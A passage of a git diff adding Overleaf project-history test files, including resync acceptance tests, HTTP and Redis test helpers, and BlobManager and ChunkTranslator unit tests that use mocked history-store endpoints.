{ + file: this.file_id, + path: '/test.png', + _hash: fileHash, + url: `http://127.0.0.1:3009/project/${this.project_id}/file/${this.file_id}`, + }, + { path: '/persistedFile' }, + ], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate( + this.project_id, + update, + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject( + this.project_id, + { + allowErrors: true, + }, + (err, res) => { + if (err) return cb(err) + assert( + res.statusCode === 500, + 'resync should have failed' + ) + cb() + } + ) + }, + ], + error => { + if (error) { + throw error + } + assert( + loggerError.calledWithMatch( + sinon.match.any, + 'blocking filestore read' + ), + 'error logged on 500' + ) + assert( + headBlob.isDone(), + 'HEAD /api/projects/:historyId/blobs/:hash should have been called' + ) + assert( + !createBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been skipped' + ) + assert( + !addFile.isDone(), + `/api/projects/${historyId}/changes should have been skipped` + ) + done() + } + ) + }) + }) + }) + + describe('when a file hash mismatches', function () { + it('should remove and re-add file w/o url', function (done) { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'test.png': { hash: EMPTY_FILE_HASH, byteLength: 0 }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + const fileContents = Buffer.from([1, 2, 3]) + const fileHash = 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74' + + MockFileStore() + .get(`/project/${this.project_id}/file/${this.file_id}`) + .reply(200, fileContents) + const headBlob = MockHistoryStore() + .head(`/api/projects/${historyId}/blobs/${fileHash}`) + .reply(200) + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${fileHash}`, fileContents) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'test.png', + newPathname: '', + }, + ], + origin: { kind: 'test-origin' }, + }, + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'test.png', + file: { + hash: fileHash, + }, + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [], + files: [ + { + file: this.file_id, + path: '/test.png', + _hash: fileHash, + createdBlob: true, + }, + ], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.project_id, cb) + }, + ], + error => { + if (error) { + throw error + } + assert(!loggerWarn.called, 'no warning logged on 404') + assert( + headBlob.isDone(), + 'HEAD /api/projects/:historyId/blobs/:hash should have been called' + ) + assert( + !createBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been skipped' + ) + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + }) + + describe("when a file exists which shouldn't", function () { + it('should send remove file updates to the history store', function (done) { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + docToKeep: { hash: EMPTY_FILE_HASH, stringLength: 0 }, + docToDelete: { hash: EMPTY_FILE_HASH, stringLength: 0 }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + MockHistoryStore() + .get(`/api/projects/${historyId}/blobs/${EMPTY_FILE_HASH}`) + .reply(200, '') + .get(`/api/projects/${historyId}/blobs/${EMPTY_FILE_HASH}`) + .reply(200, '') // blob is requested once for each file + + const deleteFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'docToDelete', + newPathname: '', + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [{ path: 'docToKeep' }], + files: [], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.project_id, cb) + }, + ], + error => { + if (error) { + throw error + } + assert( + deleteFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + }) + + describe("when a doc's contents is not up to date", function () { + beforeEach(function () { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'main.tex': { + hash: '0a207c060e61f3b88eaee0a8cd0696f46fb155eb', + stringLength: 3, + }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + MockHistoryStore() + .get( + `/api/projects/${historyId}/blobs/0a207c060e61f3b88eaee0a8cd0696f46fb155eb` + ) + .reply(200, 'a\nb') + }) + + it('should send test updates to the history store', function (done) { + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'main.tex', + textOperation: [3, '\nc'], + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [{ path: '/main.tex' }], + files: [], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + const update = { + path: '/main.tex', + projectHistoryId: historyId, + resyncDocContent: { + content: 'a\nb\nc', + }, + doc: this.doc_id, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.project_id, cb) + }, + ], + error => { + if (error) { + throw error + } + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should strip non-BMP characters in updates before sending to the history store', function (done) { + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'main.tex', + textOperation: [3, '\n\uFFFD\uFFFDc'], + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [{ path: '/main.tex' }], + files: [], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + const update = { + path: '/main.tex', + projectHistoryId: historyId, + resyncDocContent: { + content: 'a\nb\n\uD800\uDC00c', + }, + doc: this.doc_id, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.project_id, cb) + }, + ], + error => { + if (error) { + throw error + } + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should fix comments in the history store', function (done) { + const commentId = 'comment-id' + const addComment = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'main.tex', + commentId, + ranges: [{ pos: 1, length: 10 }], + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [{ path: '/main.tex' }], + files: [], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + const update = { + path: '/main.tex', + projectHistoryId: historyId, + resyncDocContent: { + content: 'a\nb', + ranges: { + comments: [ + { + id: commentId, + op: { + c: 'a', + p: 0, + hpos: 1, + hlen: 10, + t: commentId, + }, + meta: { + user_id: 'user-id', + ts: this.timestamp, + }, + }, + ], + }, + }, + doc: this.doc_id, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.project_id, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + addComment.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + }) + + describe('resyncProjectStructureOnly', function () { + it('should handle structure only updates', function (done) { + const fileHash = 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74' + + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'main.tex': { + hash: '0a207c060e61f3b88eaee0a8cd0696f46fb155eb', + stringLength: 3, + }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + const docContentRequest = MockHistoryStore() + .get( + `/api/projects/${historyId}/blobs/0a207c060e61f3b88eaee0a8cd0696f46fb155eb` + ) + .reply(200, 'a\nb') + MockHistoryStore() + .head(`/api/projects/${historyId}/blobs/${fileHash}`) + .reply(200) + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'test.png', + file: { + hash: fileHash, + }, + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + // allow a 2nd resync + MockWeb() + .post(`/project/${this.project_id}/history/resync`) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructureOnly: true, + resyncProjectStructure: { + docs: [{ path: '/main.tex' }], + files: [ + { + file: this.file_id, + path: '/test.png', + _hash: fileHash, + createdBlob: true, + }, + ], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.project_id, cb) + }, + cb => { + // fails when previous resync did not finish + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + ], + error => { + if (error) { + throw error + } + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + assert( + !docContentRequest.isDone(), + 'should not have requested doc content' + ) + done() + } + ) + }) + it('should reject partial resync on docs', function (done) { + const fileHash = 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74' + + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'main.tex': { + hash: '0a207c060e61f3b88eaee0a8cd0696f46fb155eb', + stringLength: 3, + }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + const docContentRequest = MockHistoryStore() + .get( + `/api/projects/${historyId}/blobs/0a207c060e61f3b88eaee0a8cd0696f46fb155eb` + ) + .reply(200, 'a\nb') + MockHistoryStore() + .head(`/api/projects/${historyId}/blobs/${fileHash}`) + .reply(200) + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`) + .query({ end_version: 0 }) + .reply(204) + + // allow a 2nd resync + MockWeb() + .post(`/project/${this.project_id}/history/resync`) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructureOnly: true, + resyncProjectStructure: { + docs: [{ path: '/main-renamed.tex' }], + files: [ + { + file: this.file_id, + path: '/test.png', + _hash: fileHash, + createdBlob: true, + }, + ], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject( + this.project_id, + { allowErrors: true }, + (err, res) => { + if (err) return cb(err) + expect(res.statusCode).to.equal(500) + expect(loggerError).to.have.been.calledWith( + sinon.match({ + err: { + name: 'NeedFullProjectStructureResyncError', + message: 'aborting partial resync: touched doc', + }, + }) + ) + + getFailure(this.project_id, (err, failure) => { + if (err) return cb(err) + expect(failure).to.include({ + error: + 'NeedFullProjectStructureResyncError: aborting partial resync: touched doc', + }) + cb() + }) + } + ) + }, + cb => { + // fails when previous resync did not finish + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + ], + error => { + if (error) { + throw error + } + assert(!addFile.isDone(), 'should not have persisted changes') + assert( + !docContentRequest.isDone(), + 'should not have requested doc content' + ) + done() + } + ) + }) + }) + }) + }) +}) diff --git a/services/project-history/test/acceptance/js/helpers/HistoryId.js b/services/project-history/test/acceptance/js/helpers/HistoryId.js new file mode 100644 index 0000000..1980831 --- /dev/null +++ b/services/project-history/test/acceptance/js/helpers/HistoryId.js @@ -0,0 +1,7 @@ +// TODO: This file was created by bulk-decaffeinate. +// Sanity-check the conversion and remove this comment. +let id = 0 + +export function nextId() { + return id++ +} diff --git a/services/project-history/test/acceptance/js/helpers/HistoryStoreClient.js b/services/project-history/test/acceptance/js/helpers/HistoryStoreClient.js new file mode 100644 index 0000000..f17dc07 --- /dev/null +++ b/services/project-history/test/acceptance/js/helpers/HistoryStoreClient.js @@ -0,0 +1,41 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import { expect } from 'chai' +import request from 'request' +import Settings from '@overleaf/settings' + +export function getLatestContent(olProjectId, callback) { + if (callback == null) { + callback = function () {} + } + return request.get( + { + url: `${Settings.overleaf.history.host}/projects/${olProjectId}/latest/content`, + auth: { + user: Settings.overleaf.history.user, + pass: Settings.overleaf.history.pass, + sendImmediately: true, + }, + }, + (error, res, body) => { + if (res.statusCode < 200 || res.statusCode >= 300) { + callback( + new Error( + `history store a non-success status code: ${res.statusCode}` + ) + ) + } + + return callback(error, JSON.parse(body)) + } + ) +} diff --git a/services/project-history/test/acceptance/js/helpers/ProjectHistoryApp.js b/services/project-history/test/acceptance/js/helpers/ProjectHistoryApp.js new file mode 100644 index 0000000..ae453b7 --- /dev/null +++ b/services/project-history/test/acceptance/js/helpers/ProjectHistoryApp.js @@ -0,0 +1,41 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import { app } from '../../../../app/js/server.js' + +let running = false +let initing = false +const callbacks = [] + +export function ensureRunning(callback) { + if (callback == null) { + callback = function () {} + } + if (running) { + return callback() + } else if (initing) { + return callbacks.push(callback) + } + initing = true + callbacks.push(callback) + app.listen(3054, '127.0.0.1', error => { + if (error != null) { + throw error + } + running = true + return (() => { + const result = [] + for (callback of Array.from(callbacks)) { + result.push(callback()) + } + return result + })() + }) +} diff --git a/services/project-history/test/acceptance/js/helpers/ProjectHistoryClient.js b/services/project-history/test/acceptance/js/helpers/ProjectHistoryClient.js new file mode 100644 index 0000000..92caa4b --- /dev/null +++ b/services/project-history/test/acceptance/js/helpers/ProjectHistoryClient.js @@ -0,0 +1,354 @@ +import { expect } from 'chai' +import request from 'request' +import Settings from '@overleaf/settings' +import RedisWrapper from '@overleaf/redis-wrapper' +import { db } from '../../../../app/js/mongodb.js' + +const rclient = RedisWrapper.createClient(Settings.redis.project_history) +const Keys = Settings.redis.project_history.key_schema + +export function resetDatabase(callback) { + rclient.flushdb(callback) +} + +export function initializeProject(historyId, callback) { + request.post( + { + url: 'http://127.0.0.1:3054/project', + json: { historyId }, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + expect(res.statusCode).to.equal(200) + callback(null, body.project) + } + ) +} + +export function flushProject(projectId, options, callback) { + if (typeof options === 'function') { + callback = options + options = null + } + if (!options) { + options = { allowErrors: false } + } + request.post( + { + url: `http://127.0.0.1:3054/project/${projectId}/flush`, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + if (!options.allowErrors) { + expect(res.statusCode).to.equal(204) + } + callback(error, res) + } + ) +} + +export function getSummarizedUpdates(projectId, query, callback) { + request.get( + { + url: `http://127.0.0.1:3054/project/${projectId}/updates`, + qs: query, + json: true, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + expect(res.statusCode).to.equal(200) + callback(error, body) + } + ) +} + +export function getDiff(projectId, pathname, from, to, callback) { + request.get( + { + url: `http://127.0.0.1:3054/project/${projectId}/diff`, + qs: { + pathname, + from, + to, + }, + json: true, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + expect(res.statusCode).to.equal(200) + callback(error, body) + } + ) +} + +export function getFileTreeDiff(projectId, from, to, callback) { + request.get( + { + url: `http://127.0.0.1:3054/project/${projectId}/filetree/diff`, + qs: { + from, + to, + }, + json: true, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + callback(error, body, res.statusCode) + } + ) +} + +export function getChangesInChunkSince(projectId, since, options, callback) { + request.get( + { + url: `http://127.0.0.1:3054/project/${projectId}/changes-in-chunk`, + qs: { + since, + }, + json: true, + }, + (error, res, body) => { + if (error) return callback(error) + if (!options.allowErrors) { + expect(res.statusCode).to.equal(200) + } + callback(null, body, res.statusCode) + } + ) +} + +export function getLatestSnapshot(projectId, callback) { + request.get( + { + url: `http://127.0.0.1:3054/project/${projectId}/snapshot`, + json: true, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + expect(res.statusCode).to.equal(200) + callback(null, body) + } + ) +} + +export function getSnapshot(projectId, pathname, version, options, callback) { + if (typeof options === 'function') { + callback = options + options = null + } + if (!options) { + options = { allowErrors: false } + } + request.get( + { + url: `http://127.0.0.1:3054/project/${projectId}/version/${version}/${encodeURIComponent( + pathname + )}`, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + if (!options.allowErrors) { + expect(res.statusCode).to.equal(200) + } + callback(error, body, res.statusCode) + } + ) +} + +export function pushRawUpdate(projectId, update, callback) { + rclient.rpush( + Keys.projectHistoryOps({ project_id: projectId }), + JSON.stringify(update), + callback + ) +} + +export function setFirstOpTimestamp(projectId, timestamp, callback) { + rclient.set( + Keys.projectHistoryFirstOpTimestamp({ project_id: projectId }), + timestamp, + callback + ) +} + +export function getFirstOpTimestamp(projectId, callback) { + rclient.get( + Keys.projectHistoryFirstOpTimestamp({ project_id: projectId }), + callback + ) +} + +export function clearFirstOpTimestamp(projectId, callback) { + rclient.del( + Keys.projectHistoryFirstOpTimestamp({ project_id: projectId }), + callback + ) +} + +export function getQueueLength(projectId, callback) { + rclient.llen(Keys.projectHistoryOps({ project_id: projectId }), callback) +} + +export function getQueueCounts(callback) { + return request.get( + { + url: 'http://127.0.0.1:3054/status/queue', + json: true, + }, + callback + ) +} + +export function resyncHistory(projectId, callback) { + request.post( + { + url: `http://127.0.0.1:3054/project/${projectId}/resync`, + json: true, + body: { origin: { kind: 'test-origin' } }, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + expect(res.statusCode).to.equal(204) + callback(error) + } + ) +} + +export function createLabel( + projectId, + userId, + version, + comment, + createdAt, + callback +) { + request.post( + { + url: `http://127.0.0.1:3054/project/${projectId}/labels`, + json: { comment, version, created_at: createdAt, user_id: userId }, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + expect(res.statusCode).to.equal(200) + callback(null, body) + } + ) +} + +export function getLabels(projectId, callback) { + request.get( + { + url: `http://127.0.0.1:3054/project/${projectId}/labels`, + json: true, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + expect(res.statusCode).to.equal(200) + callback(null, body) + } + ) +} + +export function deleteLabelForUser(projectId, userId, labelId, callback) { + request.delete( + { + url: `http://127.0.0.1:3054/project/${projectId}/user/${userId}/labels/${labelId}`, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + expect(res.statusCode).to.equal(204) + callback(null, body) + } + ) +} + +export function deleteLabel(projectId, labelId, callback) { + request.delete( + { + url: `http://127.0.0.1:3054/project/${projectId}/labels/${labelId}`, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + expect(res.statusCode).to.equal(204) + callback(null, body) + } + ) +} + +export function setFailure(failureEntry, callback) { + db.projectHistoryFailures.deleteOne( + { project_id: { $exists: true } }, + (err, result) => { + if (err) { + return callback(err) + } + db.projectHistoryFailures.insertOne(failureEntry, callback) + } + ) +} + +export function getFailure(projectId, callback) { + db.projectHistoryFailures.findOne({ project_id: projectId }, callback) +} + +export function transferLabelOwnership(fromUser, toUser, callback) { + request.post( + { + url: `http://127.0.0.1:3054/user/${fromUser}/labels/transfer/${toUser}`, + }, + (error, res, body) => { + if (error) { + return callback(error) + } + expect(res.statusCode).to.equal(204) + callback(null, body) + } + ) +} + +export function getDump(projectId, callback) { + request.get( + `http://127.0.0.1:3054/project/${projectId}/dump`, + (err, res, body) => { + if (err) { + return callback(err) + } + expect(res.statusCode).to.equal(200) + callback(null, JSON.parse(body)) + } + ) +} + +export function deleteProject(projectId, callback) { + request.delete(`http://127.0.0.1:3054/project/${projectId}`, (err, res) => { + if (err) { + return callback(err) + } + expect(res.statusCode).to.equal(204) + callback() + }) +} diff --git a/services/project-history/test/setup.js b/services/project-history/test/setup.js new file mode 100644 index 0000000..0bc2ff7 --- /dev/null +++ b/services/project-history/test/setup.js @@ -0,0 +1,13 @@ +import chai from 'chai' +import sinonChai from 'sinon-chai' +import chaiAsPromised from 'chai-as-promised' +import mongodb from 'mongodb-legacy' +const { ObjectId } = mongodb + +// ensure every ObjectId has the id string as a property for correct comparisons +ObjectId.cacheHexString = true + +// Chai configuration +chai.should() +chai.use(sinonChai) +chai.use(chaiAsPromised) diff --git a/services/project-history/test/unit/js/BlobManager/BlobManagerTests.js b/services/project-history/test/unit/js/BlobManager/BlobManagerTests.js new file mode 100644 index 0000000..e5c9b6e --- /dev/null +++ b/services/project-history/test/unit/js/BlobManager/BlobManagerTests.js @@ -0,0 +1,160 @@ +import sinon from 'sinon' +import { strict as esmock } from 'esmock' + +const MODULE_PATH = '../../../../app/js/BlobManager.js' + +describe('BlobManager', function () { + beforeEach(async function () { + this.callback = sinon.stub() + this.extendLock = sinon.stub().yields() + this.project_id = 'project-1' + this.historyId = 12345 + this.HistoryStoreManager = { + createBlobForUpdate: sinon.stub(), + } + this.UpdateTranslator = { + isAddUpdate: sinon.stub().returns(false), + } + this.BlobManager = await esmock(MODULE_PATH, { + '../../../../app/js/HistoryStoreManager.js': this.HistoryStoreManager, + '../../../../app/js/UpdateTranslator.js': this.UpdateTranslator, + }) + this.updates = ['update-1', 'update-2'] + }) + + describe('createBlobsForUpdates', function () { + describe('when there are no blobs to create', function () { + beforeEach(function (done) { + this.BlobManager.createBlobsForUpdates( + this.project_id, + this.historyId, + this.updates, + this.extendLock, + (error, updatesWithBlobs) => { + this.callback(error, updatesWithBlobs) + done() + } + ) + }) + + it('should not create any blobs', function () { + this.HistoryStoreManager.createBlobForUpdate.called.should.equal(false) + }) + + it('should call the callback with the updates', function () { + const updatesWithBlobs = this.updates.map(update => ({ + update, + })) + this.callback.calledWith(null, updatesWithBlobs).should.equal(true) + }) + }) + + describe('when there are blobs to create', function () { + beforeEach(function (done) { + this.UpdateTranslator.isAddUpdate.returns(true) + this.blobHash = 'test hash' + this.HistoryStoreManager.createBlobForUpdate.yields(null, { + file: this.blobHash, + }) + this.BlobManager.createBlobsForUpdates( + this.project_id, + this.historyId, + this.updates, + this.extendLock, + (error, updatesWithBlobs) => { + this.callback(error, updatesWithBlobs) + done() + } + ) + }) + + it('should create blobs', function () { + this.HistoryStoreManager.createBlobForUpdate + .calledWith(this.project_id, this.historyId, this.updates[0]) + .should.equal(true) + }) + + it('should extend the lock', function () { + this.extendLock.called.should.equal(true) + }) + + it('should call the callback with the updates', function () { + const updatesWithBlobs = this.updates.map(update => ({ + update, + blobHashes: { file: this.blobHash }, + })) + this.callback.calledWith(null, updatesWithBlobs).should.equal(true) + }) + }) + + describe('when there are blobs to create and there is a single network error', function () { + beforeEach(function (done) { + this.UpdateTranslator.isAddUpdate.returns(true) + this.blobHash = 'test hash' + this.HistoryStoreManager.createBlobForUpdate + .onFirstCall() + .yields(new Error('random failure')) + this.HistoryStoreManager.createBlobForUpdate.yields(null, { + file: this.blobHash, + }) + this.BlobManager.createBlobsForUpdates( + this.project_id, + this.historyId, + this.updates, + this.extendLock, + (error, updatesWithBlobs) => { + this.callback(error, updatesWithBlobs) + done() + } + ) + }) + + it('should create blobs', function () { + this.HistoryStoreManager.createBlobForUpdate + .calledWith(this.project_id, this.historyId, this.updates[0]) + .should.equal(true) + }) + + it('should extend the lock', function () { + this.extendLock.called.should.equal(true) + }) + + it('should call the callback with the updates', function () { + const updatesWithBlobs = this.updates.map(update => ({ + update, + blobHashes: { file: this.blobHash }, + })) + this.callback.calledWith(null, updatesWithBlobs).should.equal(true) + }) + }) + + describe('when there are blobs to create and there are multiple network errors', function () { + beforeEach(function (done) { + this.UpdateTranslator.isAddUpdate.returns(true) + this.blobHash = 'test hash' + this.error = new Error('random failure') + this.HistoryStoreManager.createBlobForUpdate.yields(this.error) + this.BlobManager.createBlobsForUpdates( + this.project_id, + this.historyId, + this.updates, + this.extendLock, + (error, updatesWithBlobs) => { + this.callback(error, updatesWithBlobs) + done() + } + ) + }) + + it('should try to create blobs', function () { + this.HistoryStoreManager.createBlobForUpdate + .calledWith(this.project_id, this.historyId, this.updates[0]) + .should.equal(true) + }) + + it('should call the callback with an error', function () { + this.callback.calledWith(this.error).should.equal(true) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/ChunkTranslator/ChunkTranslatorTests.js b/services/project-history/test/unit/js/ChunkTranslator/ChunkTranslatorTests.js new file mode 100644 index 0000000..e4b32c4 --- /dev/null +++ b/services/project-history/test/unit/js/ChunkTranslator/ChunkTranslatorTests.js @@ -0,0 +1,3050 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import { strict as esmock } from 'esmock' + +const MODULE_PATH = '../../../../app/js/ChunkTranslator.js' + +describe('ChunkTranslator', function () { + beforeEach(async function () { + this.projectId = '0123456789abc0123456789abc' + this.historyId = 12345 + this.author1 = { + id: 1, + email: 'james.allen@overleaf.com', + name: 'James Allen', + } + this.date = new Date() + this.fileHash = 'some_hash' + this.fileContents = 'Hello world, this is a test' + this.HistoryStoreManager = { + getProjectBlob: sinon.stub(), + } + this.HistoryStoreManager.getProjectBlob + .withArgs(this.historyId, this.fileHash) + .yields(null, this.fileContents) + this.WebApiManager = { + getHistoryId: sinon.stub().callsFake((projectId, cb) => { + console.log({ projectId }) + }), + } + this.WebApiManager.getHistoryId + .withArgs(this.projectId) + .yields(null, this.historyId) + this.ChunkTranslator = await esmock(MODULE_PATH, { + '../../../../app/js/HistoryStoreManager.js': this.HistoryStoreManager, + '../../../../app/js/WebApiManager.js': this.WebApiManager, + }) + this.callback = sinon.stub() + }) + + describe('with changes to the text', function () { + beforeEach(function () { + this.chunk = { + project_id: this.projectId, + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { pathname: 'main.tex', textOperation: ['Hello test, ', -6] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { pathname: 'main.tex', textOperation: [6, 'foo '] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [{ pathname: 'main.tex', textOperation: [6, -4] }], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + origin: { + kind: 'file-restore', + version: 1, + path: 'main.tex', + timestamp: this.date.toISOString(), + }, + operations: [ + { + pathname: 'main.tex', + newPathname: '', + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + origin: { + kind: 'file-restore', + version: 1, + path: 'main.tex', + timestamp: this.date.toISOString(), + }, + operations: [ + { + pathname: 'main.tex', + file: { + hash: this.fileHash, + stringLength: 42, + }, + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { + pathname: 'main.tex', + newPathname: 'main2.tex', + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + }) + + describe('convertToDiffUpdates', function () { + it('should convert them to insert and delete ops', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 3, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal(this.fileContents) + expect(updates).to.deep.equal([ + { + op: [ + { i: 'Hello test, ', p: 0 }, + { d: 'Hello ', p: 12 }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + op: [{ i: 'foo ', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + 